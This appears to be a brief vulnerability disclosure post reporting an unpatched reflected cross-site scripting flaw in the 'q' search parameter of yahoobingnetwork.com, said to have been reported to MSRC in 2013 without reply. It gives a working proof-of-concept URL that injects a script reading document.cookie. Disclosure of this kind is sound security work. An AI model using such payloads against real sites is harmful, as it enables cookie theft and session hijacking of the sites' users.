yahoobingnetwork.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, 0D

UNRESOLVED: yahoobingnetwork.com 0D XSS

Reported to MSRC on Feb. 6, 2013, No Reply Received July 17, 2013.

Reflected Cross Site Scripting in the ‘q’ Parameter of www.yahoobingnetwork.com

PoC URL http://yahoobingnetwork.com/it/search?mkt=it-IT&q=Search94933%22%3balert%28document.cookie%29//177&scope=&subscope=&url=

Zero Day XSS in yahoobingnetwork.com
0D XSS in yahoobingnetwork.com